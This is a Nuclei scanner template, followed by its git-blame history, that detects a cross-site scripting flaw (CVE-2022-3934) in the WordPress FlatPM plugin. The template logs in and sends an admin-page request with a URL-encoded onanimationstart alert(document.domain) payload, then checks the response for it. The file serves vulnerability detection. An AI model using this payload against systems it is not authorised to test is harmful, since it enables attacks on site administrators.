nuclei-templates/http/cves/2022/CVE-2022-3934.yaml

id: CVE-2022-3934

info:
  name: WordPress FlatPM <3.0.13 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.
  remediation: Fixed in version 3.0.13.
  reference:
    - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3934
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-3934
    cwe-id: CWE-79
    epss-score: 0.00077
    epss-percentile: 0.32192
    cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mehanoid
    product: flat_pm
    framework: wordpress
  tags: authenticated,wpscan,cve,cve2022,xss,flatpm,wordpress,wp-plugin

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 10s
        GET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")'
        condition: and
# digest: 4a0a00473045022100a7baf7c6bf717d2cf9698d75db501af1902af3f423aa373ca2792c65bfdb58e002207043ebd556f31a73179dbc1d02f4c817eee970be86121928717edb53f05fa9c5:922c64590222798bb761d5b6d8e72950
templates added 2023-03-05 13:42:10 +00:00			`id: CVE-2022-3934`

			`info:`
Enhancement: cves/2022/CVE-2022-3934.yaml by md 2023-03-13 19:03:01 +00:00			`name: WordPress FlatPM <3.0.13 - Cross-Site Scripting`
templates added 2023-03-05 13:42:10 +00:00			`author: r3Y3r53`
			`severity: medium`
			`description: \|`
Enhancement: cves/2022/CVE-2022-3934.yaml by md 2023-03-13 18:36:29 +00:00			`WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: Fixed in version 3.0.13.`
templates added 2023-03-05 13:42:10 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-3934`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 5.4`
			`cve-id: CVE-2022-3934`
			`cwe-id: CWE-79`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`epss-score: 0.00077`
TemplateMan Update [Wed Oct 25 17:36:18 UTC 2023] :robot: 2023-10-25 17:36:19 +00:00			`epss-percentile: 0.32192`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:a:mehanoid:flat_pm::::::wordpress::*`
templates added 2023-03-05 13:42:10 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: mehanoid`
			`product: flat_pm`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`framework: wordpress`
Auto Generated CVE annotations [Sun Mar 5 14:19:20 UTC 2023] :robot: 2023-03-05 14:19:20 +00:00			`tags: authenticated,wpscan,cve,cve2022,xss,flatpm,wordpress,wp-plugin`
templates added 2023-03-05 13:42:10 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
templates added 2023-03-05 13:42:10 +00:00			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`log={{username}}&pwd={{password}}&wp-submit=Log+In`
			`- \|`
			`@timeout: 10s`
			`GET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1`
			`Host: {{Hostname}}`

			`cookie-reuse: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code_2 == 200'`
			`- 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")'`
			`condition: and`
Auto Template Signing [Thu Oct 26 05:41:51 UTC 2023] :robot: 2023-10-26 05:41:51 +00:00			`# digest: 4a0a00473045022100a7baf7c6bf717d2cf9698d75db501af1902af3f423aa373ca2792c65bfdb58e002207043ebd556f31a73179dbc1d02f4c817eee970be86121928717edb53f05fa9c5:922c64590222798bb761d5b6d8e72950`